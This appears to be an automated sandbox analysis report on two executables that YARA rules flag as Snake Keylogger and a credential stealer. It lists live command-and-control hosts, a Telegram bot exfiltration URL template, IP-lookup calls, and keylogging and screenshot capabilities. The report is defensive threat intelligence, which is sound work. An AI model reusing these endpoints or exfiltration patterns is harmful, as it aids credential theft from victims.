Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 14:37:57 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 14:37:59 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: ckHregxJIq.exe, 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: ckHregxJIq.exe, 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: ckHregxJIq.exe, 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: ckHregxJIq.exe, 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: ckHregxJIq.exe, 00000001.00000002.1299290995.0000000002631000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 00000001.00000002.1299290995.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1345336185.00000000029A8000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ckHregxJIq.exe, 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004238000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004273000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.000000000303A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: ckHregxJIq.exe, 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.000000000303A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.000000000303A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.000000000303A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20a
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004238000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004273000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ckHregxJIq.exe, 0000000E.00000002.3733031202.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3733031202.00000000043E3000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004238000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004273000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ckHregxJIq.exe, 0000000E.00000002.3733031202.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3733031202.00000000043E3000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004238000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004273000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.00000000030E6000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000003117000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: ckHregxJIq.exe, 0000000E.00000002.3727115213.0000000003251000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.00000000030E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004238000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004273000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ckHregxJIq.exe, 0000000E.00000002.3733031202.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3733031202.00000000043E3000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004238000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004273000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004238000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004273000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004238000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004273000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: ckHregxJIq.exe, 0000000E.00000002.3727115213.0000000003113000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.0000000003183000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000002FA3000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000003013000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.000000000303A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: ckHregxJIq.exe, 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.0000000003113000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000002FA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.000000000303A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.0000000003183000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.000000000313D000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000002FCD000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000003013000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.000000000303A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: ckHregxJIq.exe, 0000000E.00000002.3733031202.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3733031202.00000000043E3000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004238000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004273000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: ckHregxJIq.exe, 0000000E.00000002.3733031202.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3733031202.00000000043E3000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004238000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004273000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000003117000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: ckHregxJIq.exe, 0000000E.00000002.3727115213.0000000003282000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000003112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49729 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, COVID19.cs

.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, COVID19.cs

.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.ckHregxJIq.exe.41d5678.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.ckHregxJIq.exe.41d5678.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.ckHregxJIq.exe.41d5678.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.ckHregxJIq.exe.414e258.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.ckHregxJIq.exe.414e258.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: ckHregxJIq.exe PID: 7868, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: ckHregxJIq.exe PID: 5956, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: aFAsiNcQRJEVeL.exe PID: 1292, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

.NET source code contains very large array initializations

Source: ckHregxJIq.exe, Form1.cs	Large array initialization: : array initializer size 719153
Source: ckHregxJIq.exe, firstStart.cs	Large array initialization: firstStart: array initializer size 4390

Source: C:\Users\user\Desktop\ckHregxJIq.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_06A2D430	1_2_06A2D430
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_06A25ABC	1_2_06A25ABC
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_06A2D926	1_2_06A2D926
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_06A5B778	1_2_06A5B778
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_06A53222	1_2_06A53222
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_06A548F8	1_2_06A548F8
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_06A5E788	1_2_06A5E788
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_06A5E798	1_2_06A5E798
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_06A5E360	1_2_06A5E360
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_06A5E343	1_2_06A5E343
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_06A56E60	1_2_06A56E60
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_06A57C00	1_2_06A57C00
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_06A57BF0	1_2_06A57BF0
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_06A5EBD0	1_2_06A5EBD0
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_06A57908	1_2_06A57908
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_06A57918	1_2_06A57918
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_07405E60	1_2_07405E60
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_074007C8	1_2_074007C8
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_07400390	1_2_07400390
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_0742332C	1_2_0742332C
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 14_2_02F2D278	14_2_02F2D278
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 14_2_02F25362	14_2_02F25362
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 14_2_02F2A088	14_2_02F2A088
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 14_2_02F2C146	14_2_02F2C146
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 14_2_02F27118	14_2_02F27118
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 14_2_02F2C738	14_2_02F2C738
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 14_2_02F2C468	14_2_02F2C468
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 14_2_02F2CA08	14_2_02F2CA08
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 14_2_02F269A0	14_2_02F269A0
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 14_2_02F2E988	14_2_02F2E988
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 14_2_02F2CFAA	14_2_02F2CFAA
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 14_2_02F2CCD8	14_2_02F2CCD8
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 14_2_02F2F630	14_2_02F2F630
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 14_2_02F23A99	14_2_02F23A99
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 14_2_02F2FA88	14_2_02F2FA88
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 14_2_02F229E0	14_2_02F229E0
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 14_2_02F2E97A	14_2_02F2E97A
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 14_2_02F23E09	14_2_02F23E09
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 15_2_06F2B778	15_2_06F2B778
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 15_2_06F23222	15_2_06F23222
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 15_2_06F248FA	15_2_06F248FA
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 15_2_06F2E798	15_2_06F2E798
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 15_2_06F2E788	15_2_06F2E788
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 15_2_06F2E360	15_2_06F2E360
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 15_2_06F2E351	15_2_06F2E351
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 15_2_06F26E60	15_2_06F26E60
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 15_2_06F27C00	15_2_06F27C00
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 15_2_06F27BF0	15_2_06F27BF0
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 15_2_06F2EBD0	15_2_06F2EBD0
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 15_2_06F27918	15_2_06F27918
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 15_2_06F27908	15_2_06F27908
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 15_2_0869D919	15_2_0869D919
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 15_2_08695ABC	15_2_08695ABC
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 15_2_0869D427	15_2_0869D427
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 15_2_0869D430	15_2_0869D430
